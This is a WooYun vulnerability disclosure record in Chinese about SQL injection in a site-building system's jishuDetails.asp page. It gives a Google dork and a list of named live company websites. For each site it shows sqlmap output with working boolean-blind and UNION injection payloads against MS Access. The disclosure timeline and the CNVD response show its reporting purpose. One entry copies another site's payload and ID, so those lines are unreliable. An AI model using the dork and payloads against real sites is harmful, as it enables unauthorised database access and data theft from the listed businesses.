当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105854

漏洞标题:某建站系统多个sql Injection打包(涉及大量企业站)#2

相关厂商:CNCERT国家互联网应急中心

漏洞作者: 从容

提交时间:2015-04-07 15:03

修复时间:2015-07-09 18:18

公开时间:2015-07-09 18:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向第三方安全合作伙伴开放
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

某建站系统多个sql Injection打包(涉及大量企业站)#2

详细说明:

前人漏洞: WooYun: 某建站系统多个sql注入点打包提交(影响大量企业站)
上一发: WooYun: 某建站系统多个sql Injection打包(涉及大量企业站)
UNION注入
最后一发,还存在一处注入:

Google:
inurl:jishuDetails.asp?newsID=


http://www.wanguanjixie.cn/jishuDetails.asp?newsID=2832
http://www.qieguanji051258628685.com/jishuDetails.asp?newsID=164
http://www.yymada.net/tlccq/jishuDetails.asp?newsID=53
http://www.wanguanji.org.cn/jishuDetails.asp?newsID=166
http://www.czchint.com/jishuDetails.asp?newsID=60
http://www.daojiaoji158.com/jishuDetails.asp?newsID=160
http://www.suoguanji.name/jishuDetails.asp?newsID=166
http://www.15895595058.net/jishuDetails.asp?newsID=2186
http://wanguanjixieorg.gotoip55.com/jishuDetails.asp?newsID=2395
http://www.kuoguanji168.com/jishuDetails.asp?newsID=2342
http://www.boolad365.cn/jyfm/jishuDetails.asp?newsID=70
http://www.xtcxdjx.com/jishuDetails.asp?newsID=60
http://www.17795.org/zhenzi/jishuDetails.asp?newsID=50

漏洞证明:

http://www.wanguanjixie.cn/jishuDetails.asp?newsID=2832


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=2832 AND 3582=3582
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-3924 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(113)&CHR(118)&
CHR(112)&CHR(113)&CHR(72)&CHR(85)&CHR(75)&CHR(107)&CHR(88)&CHR(118)&CHR(69)&CHR(
80)&CHR(88)&CHR(113)&CHR(113)&CHR(106)&CHR(112)&CHR(106)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


http://www.qieguanji051258628685.com/jishuDetails.asp?newsID=164


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=164 AND 1332=1332
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-3734 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(120)&CHR(122)&
CHR(107)&CHR(113)&CHR(71)&CHR(78)&CHR(102)&CHR(74)&CHR(108)&CHR(69)&CHR(69)&CHR(
89)&CHR(101)&CHR(104)&CHR(113)&CHR(120)&CHR(122)&CHR(98)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


http://www.yymada.net/tlccq/jishuDetails.asp?newsID=53


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=53 AND 7320=7320
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-1967 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(98)&CHR(122)&C
HR(98)&CHR(113)&CHR(112)&CHR(109)&CHR(99)&CHR(79)&CHR(75)&CHR(102)&CHR(75)&CHR(1
06)&CHR(73)&CHR(70)&CHR(113)&CHR(98)&CHR(107)&CHR(118)&CHR(113),NULL,NULL,NULL,N
ULL FROM MSysAccessObjects%16
---


http://www.wanguanji.org.cn/jishuDetails.asp?newsID=166


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=166 AND 2215=2215
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-6530 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(120)&CHR(118)&
CHR(122)&CHR(113)&CHR(97)&CHR(105)&CHR(74)&CHR(113)&CHR(103)&CHR(97)&CHR(84)&CHR
(86)&CHR(65)&CHR(67)&CHR(113)&CHR(113)&CHR(107)&CHR(120)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


http://www.czchint.com/jishuDetails.asp?newsID=60


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=60 AND 7127=7127
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-6782 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(113)
&CHR(118)&CHR(98)&CHR(113)&CHR(65)&CHR(83)&CHR(101)&CHR(105)&CHR(78)&CHR(102)&CH
R(117)&CHR(115)&CHR(87)&CHR(100)&CHR(113)&CHR(118)&CHR(120)&CHR(118)&CHR(113),NU
LL,NULL FROM MSysAccessObjects%16
---


http://www.dapenggunhuji.com/jishuDetails.asp?newsID=165


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=165 AND 3419=3419
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-3455 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(113)&CHR(98)&C
HR(122)&CHR(113)&CHR(76)&CHR(72)&CHR(84)&CHR(79)&CHR(83)&CHR(113)&CHR(80)&CHR(87
)&CHR(104)&CHR(104)&CHR(113)&CHR(107)&CHR(122)&CHR(112)&CHR(113),NULL,NULL,NULL,
NULL FROM MSysAccessObjects%16
---


http://www.daojiaoji158.com/jishuDetails.asp?newsID=160


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=160 AND 4823=4823
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-9534 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(122)
&CHR(122)&CHR(106)&CHR(113)&CHR(106)&CHR(108)&CHR(72)&CHR(108)&CHR(110)&CHR(107)
&CHR(73)&CHR(118)&CHR(122)&CHR(107)&CHR(113)&CHR(98)&CHR(118)&CHR(98)&CHR(113),N
ULL,NULL FROM MSysAccessObjects%16
---


http://www.suoguanji.name/jishuDetails.asp?newsID=166


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=166 AND 5627=5627
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-9512 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(112)&CHR(122)&
CHR(98)&CHR(113)&CHR(78)&CHR(112)&CHR(88)&CHR(104)&CHR(116)&CHR(117)&CHR(79)&CHR
(80)&CHR(81)&CHR(80)&CHR(113)&CHR(107)&CHR(98)&CHR(118)&CHR(113),NULL,NULL,NULL,
NULL FROM MSysAccessObjects%16
---


http://www.15895595058.net/jishuDetails.asp?newsID=2186


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=2186 AND 6581=6581
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-8658 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(118)
&CHR(118)&CHR(107)&CHR(113)&CHR(110)&CHR(101)&CHR(113)&CHR(113)&CHR(108)&CHR(75)
&CHR(117)&CHR(78)&CHR(86)&CHR(90)&CHR(113)&CHR(112)&CHR(112)&CHR(122)&CHR(113),N
ULL,NULL FROM MSysAccessObjects%16
---


http://wanguanjixieorg.gotoip55.com/jishuDetails.asp?newsID=2395


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=2395 AND 3660=3660
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-5925 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(98)&
CHR(107)&CHR(118)&CHR(113)&CHR(66)&CHR(114)&CHR(70)&CHR(66)&CHR(107)&CHR(80)&CHR
(74)&CHR(100)&CHR(67)&CHR(86)&CHR(113)&CHR(118)&CHR(98)&CHR(118)&CHR(113),NULL,N
ULL FROM MSysAccessObjects%16
---


http://www.kuoguanji168.com/jishuDetails.asp?newsID=2342


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=2342 AND 3012=3012
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-8444 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(107)&CHR(106)&
CHR(118)&CHR(113)&CHR(81)&CHR(73)&CHR(100)&CHR(79)&CHR(78)&CHR(77)&CHR(73)&CHR(1
10)&CHR(119)&CHR(99)&CHR(113)&CHR(107)&CHR(106)&CHR(112)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


http://www.boolad365.cn/jyfm/jishuDetails.asp?newsID=70


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=2342 AND 3012=3012
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-8444 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(107)&CHR(106)&
CHR(118)&CHR(113)&CHR(81)&CHR(73)&CHR(100)&CHR(79)&CHR(78)&CHR(77)&CHR(73)&CHR(1
10)&CHR(119)&CHR(99)&CHR(113)&CHR(107)&CHR(106)&CHR(112)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


http://www.xtcxdjx.com/jishuDetails.asp?newsID=60


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
Payload: newsID=IIF(4071=4071,60,1/0)
---


http://www.17795.org/zhenzi/jishuDetails.asp?newsID=50


---
Place: GET
Parameter: newsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsID=50 AND 1955=1955
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: newsID=-4702 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(107)&CHR(113)&
CHR(118)&CHR(113)&CHR(69)&CHR(87)&CHR(98)&CHR(120)&CHR(103)&CHR(117)&CHR(83)&CHR
(67)&CHR(98)&CHR(98)&CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


修复方案:

过滤

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-04-10 18:16

厂商回复:

CNVD未直接复现所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论